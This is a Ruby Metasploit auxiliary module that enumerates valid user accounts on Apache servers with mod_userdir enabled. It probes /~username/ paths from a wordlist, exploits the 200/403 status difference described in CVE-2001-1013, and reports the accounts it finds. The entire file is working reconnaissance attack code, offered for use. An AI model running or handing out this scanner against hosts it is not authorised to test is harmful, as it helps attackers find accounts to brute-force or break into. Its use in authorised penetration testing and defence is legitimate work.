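##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  # Status codes mod_userdir answers with for an account that exists:
  # 200 when the home page is served, 403 when the account exists but the
  # directory is absent or not readable (the behaviour described in CVE-2001-1013).
  FOUND_CODES = [200, 403].freeze

  # Per-request timeout, in seconds, handed to send_request_cgi!.
  REQUEST_TIMEOUT = 20

  def initialize
    super(
      'Name' => 'Apache "mod_userdir" User Enumeration',
      'Description' => %q{Apache with the UserDir directive enabled generates different error
        codes when a username exists and there is no public_html directory and when the username
        does not exist, which could allow remote attackers to determine valid usernames on the
        server.},
      'Author' => [
        'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
      ],
      'References' => [
        ['BID', '3335'],
        ['CVE', '2001-1013'],
        ['OSVDB', '637'],
      ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
        OptPath.new('USER_FILE', [
          true, "File containing users, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
        ]),
      ]
    )

    # Only usernames are consumed from AuthBrute; hide the password-related knobs.
    deregister_options(
      'PASSWORD',
      'PASS_FILE',
      'USERPASS_FILE',
      'STOP_ON_SUCCESS',
      'BLANK_PASSWORDS',
      'USER_AS_PASS'
    )
  end

  # Scanner entry point, invoked once per target host.
  #
  # Walks USER_FILE through AuthBrute's each_user_pass (the password part of each
  # pair is ignored), records every username mod_userdir acknowledges in
  # @users_found, and stores the result as a 'users' note on the host.
  #
  # @param ip [String] host being scanned (rhost/rport/ssl are read from the datastore)
  # @return [void]
  def run_host(ip)
    @users_found = {}

    # A server that answers 200/403 for a name that cannot exist would flag
    # every wordlist entry; detect that once instead of reporting noise.
    if catch_all_userdir?
      print_error("#{full_uri} - Server answers for a random ~user path, results would be unreliable; skipping")
      return
    end

    each_user_pass { |user, _pass| do_login(user) }

    if @users_found.empty?
      print_status("#{full_uri} - No users found.")
      return
    end

    users = @users_found.keys.sort
    print_good("#{full_uri} - Users found: #{users.join(", ")}")
    report_note(
      :host => rhost,
      :port => rport,
      :proto => 'tcp',
      :sname => (ssl ? 'https' : 'http'),
      :type => 'users',
      :data => { :users => users.join(", ") }
    )
  end

  # Probes <TARGETURI>~<user>/ and records +user+ in @users_found when the
  # response status is one of FOUND_CODES.
  #
  # Transport failures are logged at verbose level and treated as "no answer",
  # so one flaky request does not abort the rest of the wordlist.
  #
  # @param user [String] candidate username taken from USER_FILE
  # @return [void]
  def do_login(user)
    vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
    code = userdir_status(user)
    return if code.nil?

    if FOUND_CODES.include?(code)
      print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
      @users_found[user] = :reported
    else
      vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
    end
  end

  private

  # Issues the GET for a single ~user path and returns its status code.
  #
  # @param user [String] username placed in the path
  # @return [Integer, nil] HTTP status code, or nil when no usable response came
  #   back (connection refused/unreachable, timeout, broken pipe)
  def userdir_status(user)
    # '~user/' is appended directly to the normalized TARGETURI, so TARGETURI is
    # expected to end in '/' (the default) for the request to read /~user/.
    payload = "#{normalize_uri(target_uri.path)}~#{user}/"
    # The bang variant follows redirects, so the code reflects the final page.
    res = send_request_cgi!(
      {
        'method' => 'GET',
        'uri' => payload,
        'ctype' => 'text/plain'
      }, REQUEST_TIMEOUT
    )
    return nil unless res

    res.code
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
    vprint_error("#{full_uri} - #{e.class}: #{e.message}")
    nil
  rescue ::Timeout::Error, ::Errno::EPIPE => e
    vprint_error("#{full_uri} - #{e.class}: #{e.message}")
    nil
  end

  # True when a random, implausible username is still answered with a "found"
  # status, i.e. the server does not distinguish existing users at all.
  #
  # @return [Boolean]
  def catch_all_userdir?
    code = userdir_status(Rex::Text.rand_text_alpha_lower(12))
    !code.nil? && FOUND_CODES.include?(code)
  end
end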